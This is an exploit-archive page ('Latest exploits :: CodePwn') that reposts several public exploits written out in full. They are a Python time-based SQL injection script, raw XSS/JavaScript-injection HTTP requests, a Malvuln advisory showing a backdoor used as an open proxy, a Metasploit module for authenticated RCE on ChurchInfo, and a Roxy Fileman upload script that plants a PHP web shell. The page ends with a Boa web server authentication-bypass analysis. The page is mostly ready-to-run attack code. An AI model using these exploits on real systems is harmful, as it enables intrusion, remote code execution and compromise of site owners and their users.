Latest exploits :: CodePwn

<pre><code># Exploit Title: Helmet Store Showroom 1.0 - authenticated SQL Injection # Date: 25-11-2022 # Exploit Author: syad # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html # Version: 1.0 # Tested on: Windows 10 + XAMPP 3.2.4 # CVE ID : N/A # Description # The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection. import requests import sys import pyfiglet sess = requests.Session() proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"} def login1(ip,username,password): x = "http://%s/hss/classes/Login.php?f=login" % ip login = {'username':username, 'password':password} r = sess.post(x, data=login, proxies=proxies) #print(r.content) def login(ip): x = ("http://%s/hss/admin") % ip r = sess.get(x,proxies=proxies) if "Welcome to Helmet Store Showroom - PHP" in r.text: print("--------------------------------------------") print("[+] Success Login") def detect_sql(ip): x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip r = sess.get(x,proxies=proxies) if "You have an error in your SQL syntax" in r.text: print("[+] Found SQL Error") def time_based_sqli(ip): x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip r = sess.get(x,proxies=proxies) print("[+] Time Based SQL Found") print("[*]!!! Time To Report !!!") if __name__ == "__main__": result = pyfiglet.figlet_format("PWN") print(result) try: ip = sys.argv[1].strip() username = sys.argv[2].strip() password = sys.argv[3].strip() except IndexError: print("[-] Usage %s <ip> <username> <password>" % sys.argv[0]) print("[-] Example: %s 192.168.1.x" % sys.argv[0]) sys.exit(-1) login1(ip,username,password) login(ip) detect_sql(ip) time_based_sqli(ip) </code></pre>

<pre><code>## Title: Ecommerse-1.0 XSS-Reflected Hijack-credentials - JavaScript Injection ## Author: nu11secur1ty ## Date: 11.23.2022 ## Vendor: https://github.com/winston-dsouza ## Software: https://github.com/winston-dsouza/ecommerce-website ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website ## Description: The value of the eMail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick the users of this system, very easy to visit a very dangerous link from anywhere, and then the game will over for these customers. Also, the attacker can create a network from botnet computers by using this vulnerability. ## STATUS: HIGH Vulnerability [+] Exploit00: ```POST POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f Origin: http://pwnedhost.com Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/ecommerce/index.php Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` ## Description01: JavaScript can be injected into the application response (a vulnerable app - signup_script.php, no sanitizing submit function). The attacker can crash the MySQL server by sending large bites of POST requests to the MySQL server of this system. ## STATUS: HIGH Vulnerability - CRITICAL ## Real attack: [+] Exploit01: ```POST POST /ecommerce/signup_script.php HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f Origin: http://pwnedhost.com Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/ecommerce/index.php Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 1070 eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website) ## Proof and Exploit: [href](https://streamable.com/3r4t36) ## Real Exploit: [href](https://streamable.com/n3b5ev) ## Real Exploit - code insert: [href](https://streamable.com/64dmo2) ## Time spent `1:45` </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/f312e3a436995b86b205a1a37b1bf10f.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Backup media: infosec.exchange/@malvuln Threat: Backdoor.Win32.Serman.a Vulnerability: Unauthenticated Open Proxy Family: Serman Type: PE32 MD5: f312e3a436995b86b205a1a37b1bf10f Vuln ID: MVID-2022-0659 Disclosure: 11/22/2022 Description: The malware listens on TCP port 21422 by default but it can be changed. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host. E.g. using port 5555 SOCKS4 version 4A server (beta) autor: Stanimir Jordanov * e-mail: stjordanov@hotmail.com Usage: socks4 <LocalPort> [LogFile] C:\dump>wwm.exe 5555 out.txt SOCKS 4 service started: redirecting localhost:5555 Press Ctrl+C to end ... Connecting to: 192.168.18.128:80 ID:2C34 Connected to: 192.168.18.128:80 ID:2C34 Connection closed ID:2C34 Connecting to: 192.168.18.128:80 ID:25BC Connected to: 192.168.18.128:80 ID:25BC Connection closed ID:25BC Connecting to: 192.168.18.128:80 ID:A4 Connected to: 192.168.18.128:80 ID:A4 Connection closed ID:A4 Exploit/PoC: Port scan: Connecting to: 192.168.18.128:666 ID:2B04 Cannot connect to: 192.168.18.128:666 ID:2B04 Connecting to: 192.168.18.128:21 ID:2DE4 Connected to: 192.168.18.128:21 ID:2DE4 Connection closed ID:2DE4 (Port scan): (Port closed): C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:666 -v * Trying 192.168.18.125:5555... * SOCKS4 communication to 192.168.18.128:666 * SOCKS4 connect to IPv4 192.168.18.128 (locally resolved) * Can't complete SOCKS4 connection to 0.0.0.0:0. (91), request rejected or failed. * Closing connection 0 curl: (97) Can't complete SOCKS4 connection to 0.0.0.0:0. (91), request rejected or failed. (Port open): C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:21 -v * Trying 192.168.18.125:5555... * SOCKS4 communication to 192.168.18.128:21 * SOCKS4 connect to IPv4 192.168.18.128 (locally resolved) * SOCKS4 request granted. * Connected to 192.168.18.125 (192.168.18.125) port 5555 (#0) > GET / HTTP/1.1 > Host: 192.168.18.128:21 > User-Agent: curl/7.83.1 > Accept: */* > * Received HTTP/0.9 when not allowed * Closing connection 0 curl: (1) Received HTTP/0.9 when not allowed (Download files): C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128/DOOM.exe -v --output 2.txt * Trying 192.168.18.125:5555... % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* SOCKS4 communication to 192.168.18.128:80 * SOCKS4 connect to IPv4 192.168.18.128 (locally resolved) * SOCKS4 request granted. * Connected to 192.168.18.125 (192.168.18.125) port 5555 (#0) GET /DOOM.exe HTTP/1.1 Host: 192.168.18.128 User-Agent: curl/7.83.1 Accept: */* * Mark bundle as not supporting multiuse * HTTP 1.0, assume close after body HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.7.6 Date: Tue, 22 Nov 2022 02:15:31 GMT Content-type: application/x-msdos-program Content-Length: 103533 Last-Modified: Sat, 03 Aug 2019 04:57:12 GMT { [6794 bytes data] 100 101k 100 101k 0 0 474k 0 --:--:-- --:--:-- --:--:-- 488k * Closing connection 0 C:\Users\gg\Desktop>2.txt DOOMED!!! Press any key to continue . . . Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'ChurchInfo 1.2.13-1.3.0 Authenticated RCE', 'Description' => %q{ This module exploits the logic in the CartView.php page when crafting a draft email with an attachment. By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and then browsing to the location of the uploaded PHP file on the web server, arbitrary code execution as the web daemon user (e.g. www-data) can be achieved. }, 'License' => MSF_LICENSE, 'Author' => [ 'm4lwhere <m4lwhere@protonmail.com>' ], 'References' => [ ['URL', 'http://www.churchdb.org/'], ['URL', 'http://sourceforge.net/projects/churchinfo/'], ['CVE', '2021-43258'] ], 'Platform' => 'php', 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [['Automatic Targeting', { 'auto' => true }]], 'DisclosureDate' => '2021-10-30', # Reported to ChurchInfo developers on this date 'DefaultTarget' => 0, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK', 'IOC_IN_LOGS'] } ) ) # Set the email subject and message if interested register_options( [ Opt::RPORT(80), OptString.new('USERNAME', [true, 'Username for ChurchInfo application', 'admin']), OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']), OptString.new('TARGETURI', [true, 'The location of the ChurchInfo app', '/churchinfo/']), OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Read this now!']), OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Hello there!']) ] ) end def check if datastore['SSL'] == true proto_var = 'https' else proto_var = 'http' end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'Default.php'), 'method' => 'GET', 'vars_get' => { 'Proto' => proto_var, 'Path' => target_uri.path } ) unless res return CheckCode::Unknown('Target did not respond to a request to its login page!') end # Check if page title is the one that ChurchInfo uses for its login page. if res.body.match(%r{<title>ChurchInfo: Login</title>}) print_good('Target is ChurchInfo!') else return CheckCode::Safe('Target is not running ChurchInfo!') end # Check what version the target is running using the upgrade pages. res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_14To1_3_0.php'), 'method' => 'GET' ) if res && (res.code == 500 || res.code == 200) return CheckCode::Vulnerable('Target is running ChurchInfo 1.3.0!') end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_13To1_2_14.php'), 'method' => 'GET' ) if res && (res.code == 500 || res.code == 200) return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.14!') end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_12To1_2_13.php'), 'method' => 'GET' ) if res && (res.code == 500 || res.code == 200) return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.13!') else return CheckCode::Safe('Target is not running a vulnerable version of ChurchInfo!') end end # # The exploit method attempts a login, adds items to the cart, then creates the email attachment. # Adding items to the cart is required for the server-side code to accept the upload. # def exploit # Need to grab the PHP session cookie value first to pass to application vprint_status('Gathering PHP session cookie') if datastore['SSL'] == true vprint_status('SSL is true, changing protocol to HTTPS') proto_var = 'https' else vprint_status('SSL is false, leaving protocol as HTTP') proto_var = 'http' end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'Default.php'), 'method' => 'GET', 'vars_get' => { 'Proto' => proto_var, 'Path' => datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + datastore['TARGETURI'] }, 'keep_cookies' => true ) # Ensure we get a 200 from the application login page unless res && res.code == 200 fail_with(Failure::UnexpectedReply, "#{peer} - Unable to reach the ChurchInfo login page (response code: #{res.code})") end # Check that we actually are targeting a ChurchInfo server. unless res.body.match(%r{<title>ChurchInfo: Login</title>}) fail_with(Failure::NotVulnerable, 'Target is not a ChurchInfo!') end # Grab our assigned session cookie cookie = res.get_cookies vprint_good("PHP session cookie is #{cookie}") vprint_status('Attempting login') # Attempt a login with the cookie assigned, server will assign privs on server-side if authenticated res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'Default.php'), 'method' => 'POST', 'vars_post' => { 'User' => datastore['USERNAME'], 'Password' => datastore['PASSWORD'], 'sURLPath' => datastore['TARGETURI'] } ) # A valid login will give us a 302 redirect to TARGETURI + /CheckVersion.php so check that. unless res && res.code == 302 && res.headers['Location'] == datastore['TARGETURI'] + '/CheckVersion.php' fail_with(Failure::UnexpectedReply, "#{peer} - Check if credentials are correct (response code: #{res.code})") end vprint_good("Location header is #{res.headers['Location']}") print_good("Logged into application as #{datastore['USERNAME']}") vprint_status('Attempting exploit') # We must add items to the cart before we can send the emails. This is a hard requirement server-side. print_status('Navigating to add items to cart') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'SelectList.php'), 'method' => 'GET', 'vars_get' => { 'mode' => 'person', 'AddAllToCart' => 'Add+to+Cart' } ) # Need to check that items were successfully added to the cart # Here we're looking through html for the version string, similar to: # Items in Cart: 2 unless res && res.code == 200 fail_with(Failure::UnexpectedReply, "#{peer} - Unable to add items to cart via HTTP GET request to SelectList.php (response code: #{res.code})") end cart_items = res.body.match(/Items in Cart: (?<cart>\d)/) unless cart_items fail_with(Failure::UnexpectedReply, "#{peer} - Server did not respond with the text 'Items in Cart'. Is this a ChurchInfo server?") end if cart_items['cart'].to_i < 1 print_error('No items in cart detected') fail_with(Failure::UnexpectedReply, 'Failure to add items to cart, no items were detected. Check if there are person entries in the application') end print_good("Items in Cart: #{cart_items}") # Uploading exploit as temporary email attachment print_good('Uploading exploit via temp email attachment') payload_name = Rex::Text.rand_text_alphanumeric(5..14) + '.php' vprint_status("Payload name is #{payload_name}") # Create the POST payload with required parameters to be parsed by the server post_data = Rex::MIME::Message.new post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Attach\"; filename=\"#{payload_name}\"") post_data.add_part(datastore['EMAIL_SUBJ'], '', nil, 'form-data; name="emailsubject"') post_data.add_part(datastore['EMAIL_MESG'], '', nil, 'form-data; name="emailmessage"') post_data.add_part('Save Email', '', nil, 'form-data; name="submit"') file = post_data.to_s file.strip! res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'CartView.php'), 'method' => 'POST', 'data' => file, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" ) # Ensure that we get a 200 and the intended payload was # successfully uploaded and attached to the draft email. unless res.code == 200 && res.body.include?("Attach file: #{payload_name}") fail_with(Failure::Unknown, 'Failed to upload the payload.') end print_good("Exploit uploaded to #{target_uri.path + 'tmp_attach/' + payload_name}") # Have our payload deleted after we exploit register_file_for_cleanup(payload_name) # Make a GET request to the PHP file that was uploaded to execute it on the target server. print_good('Executing payload with GET request') send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'tmp_attach', payload_name), 'method' => 'GET' ) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end </code></pre>

<pre><code># Exploit Title: Roxy Fileman <= 1.4.6 Arbitrary File Upload (Unathenticated) # Date: 11/12/2022 # Exploit Author: Hadi Mene <hadi_mene@hotmail.com> # Vendor Homepage: roxyfileman.com # Software Link: https://web.archive.org/web/20210126213412/https://roxyfileman.com/download.php?f=1.4.6-php # Version: <= 1.4.6 # Tested on: Ubuntu 18.04 # CVE : CVE-2022-40797 # https://nvd.nist.gov/vuln/detail/CVE-2022-40797 import requests from optparse import OptionParser from os.path import basename banner = '#################################################\n' banner += '# Roxy Fileman <= 1.4.6 Arbitrary File Upload #\n' banner += '#\t\t\t\t\t\t#\n' banner += '#\tCVE-2022-40797 exploit code\t\t#\n' banner += '#\t\t\t\t\t\t#\n' banner += '#\t\t\t\t\t\t#\n' banner += '# Author : Hadi Mene <hadi_mene@hotmail.com>\t#\n' banner += '#\t\t\t\t\t\t#\n' banner += '#################################################\n' parser = OptionParser() parser.add_option("-u", "--url", dest="url", help="url of roxy fileman installation") parser.add_option("-s", "--shell",dest="shell", default=False, help="path of the php shell if not specified defaut shell will be uploaded ") (options, args) = parser.parse_args() if options.url is None: parser.error('URL is required use -h for help') url = options.url #It seems that in some versions of the app an '/' in the end of the url breaks the exploit code if (url.endswith('/')): url = url[:-1] # we delete that '/' webroot = options.url.split('/')[3:] webroot = '/'+ '/'.join(webroot) if (webroot.endswith('/')): webroot = webroot[:-1] webroot = webroot+'/Uploads' if options.shell: shell = open(options.shell,'r').read() filename = basename(options.shell) filename = filename.split('.')[0] else: # default shell shell = "<?php system($_GET['cmd']); ?>" filename = 'shell' headers = { 'Host': (url.split('/')[2]), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'multipart/form-data; boundary=---------------------------39556237418830295983527604767', 'Origin': (url.split('/')[2]), 'Connection': 'close', } data = '-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="method"\r\n\r\najax\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="d"\r\n\r\n'+(webroot)+'\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="files[]"; filename="'+(filename)+'.phar"\r\nContent-Type: text/plain\r\n\r\n'+shell+'\n\r\n-----------------------------39556237418830295983527604767--\r\n' #We check if a file with the same filename is already there #because Roxy doesn't overwrite file instead it changes the filename of the newly uploaded file if 'href="'+filename+'.phar"' in (requests.get(url+'/Uploads/').text): already_uploaded = True else: already_uploaded = False # file upload req = requests.post(url+'/php/upload.php', headers=headers, data=data, verify=False) response = (req.text) print(banner) if '{"res":"ok","msg":""}' in (response): # success print('File Uploaded Successfully!!!') if already_uploaded: print('A file with the same filename is already on the server..') print('URL: '+url+'/Uploads/'+(filename)+' - Copy X.phar ') else: print('URL: '+url+'/Uploads/'+(filename)+'.phar') else: # failure print('Shell Upload Failed :((( ') print(response) #debug </code></pre>

<pre><code># Exploit Title: Boa Web Server 0.94.13-0.94.14 Authentication Bypass # Date: 19-11-2022 # Exploit Author: George Tsimpidas # Vendor: https://github.com/gpg/boa # CVE: N/A # Tested on: Debian 5.18.5 Description : Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the correct security constraint on the HEAD http method allowing everyone to bypass the Basic Authorization Mechanism. Culprit : if (!memcmp(req->logline, "GET ", 4)) req->method = M_GET; else if (!memcmp(req->logline, "HEAD ", 5)) /* head is just get w/no body */ req->method = M_HEAD; else if (!memcmp(req->logline, "POST ", 5)) req->method = M_POST; else { log_error_doc(req); fprintf(stderr, "malformed request: \"%s\"\n", req->logline); send_r_not_implemented(req); return 0; } The req->method = M_HEAD; is being parsed directly on the response.c file, looking at how the method is being implemented for one of the response codes : /* R_NOT_IMP: 505 */ void send_r_bad_version(request * req) { SQUASH_KA(req); req->response_status = R_BAD_VERSION; if (!req->simple) { req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n"); print_http_headers(req); req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminate header */ } if (req->method != M_HEAD) { req_write(req, "<HTML><HEAD><TITLE>505 HTTP Version Not Supported</TITLE></HEAD>\n" "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP versions " "other than 0.9 and 1.0 " "are not supported in Boa.\nVersion encountered: "); req_write(req, req->http_version); req_write(req, "</BODY></HTML>\n"); } req_flush(req); } Above code condition indicates that if (req->method != M_HEAD) therefore if the the requested method does not equal to M_HEAD then req_write(req, "<HTML><HEAD><TITLE>505 HTTP Version Not Supported</TITLE></HEAD>\n" "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP versions " "other than 0.9 and 1.0 " "are not supported in Boa.\nVersion encountered: "); req_write(req, req->http_version); req_write(req, "</BODY></HTML>\n"); } So if the method actually contains the http method of HEAD it's being passed for every function that includes all the response code methods. </code></pre>